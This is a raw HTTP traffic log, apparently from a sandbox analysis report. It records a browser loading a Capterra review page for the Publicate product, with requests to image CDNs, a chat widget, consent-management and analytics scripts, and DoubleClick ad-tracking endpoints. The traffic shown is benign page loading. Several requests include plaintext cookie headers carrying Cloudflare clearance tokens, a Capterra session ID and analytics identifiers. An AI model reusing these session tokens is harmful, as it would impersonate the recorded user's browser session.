Source: global traffic HTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/1a2b2816-ff47-405e-a9e2-2b8d6fd68dfd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/0d820dd6-6e0b-43de-becb-e9078a2d9fac.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /g/1edf9f48-375c-43f8-af0d-9773874beeb2/www.capterra.com/p/145471/Publicate/0.json?version=1.3.0 HTTP/1.1Host: seoab.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /include/1725034800000/5amzsk8w99z9.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.capterra.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /us1/v5/datadog-rum.js HTTP/1.1Host: www.datadoghq-browser-agent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /g/1edf9f48-375c-43f8-af0d-9773874beeb2/www.capterra.com/p/145471/Publicate/0.json?version=1.3.0 HTTP/1.1Host: seoab.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937 HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /web-vitals/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/989b7b21-d05b-49b3-9b8a-3dbec459287a.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/runtime~main.72ecb88a.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://js.driftt.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2FAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/9.4a3e9801.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://js.driftt.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2FAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/main~493df0b3.8510c064.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://js.driftt.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2FAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /faas-modal-payload.js?formId=3ob5sl3RSLbslH6LvzUKQc HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _ga=GA1.2.1968510630.1725034605; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f
Source: global traffic HTTP traffic detected: GET /faas-modal-payload.js?formId=7DbjmVSFi4BGlfm43ATGbM HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _ga=GA1.2.1968510630.1725034605; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f
Source: global traffic HTTP traffic detected: GET /faas-modal-payload.js?formId=6HyOcTRcBkZLAc2QGex3tl HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _ga=GA1.2.1968510630.1725034605; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f
Source: global traffic HTTP traffic detected: GET /web-vitals@4.2.3/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /td/rul/1072635088?random=1725034607177&cv=11&fst=1725034607177&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /td/fls/rul/activityi;fledge=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /td/ga/rul?tid=G-M5DGBDHG2R&gacid=1968510630.1725034605&gtm=45je48s0v879522845z876106154za200zb76106154&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1849167802 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034607177&cv=11&fst=1725034607177&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /activityi;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global traffic HTTP traffic detected: GET /core/assets/css/8.6ac3976b.chunk.css HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
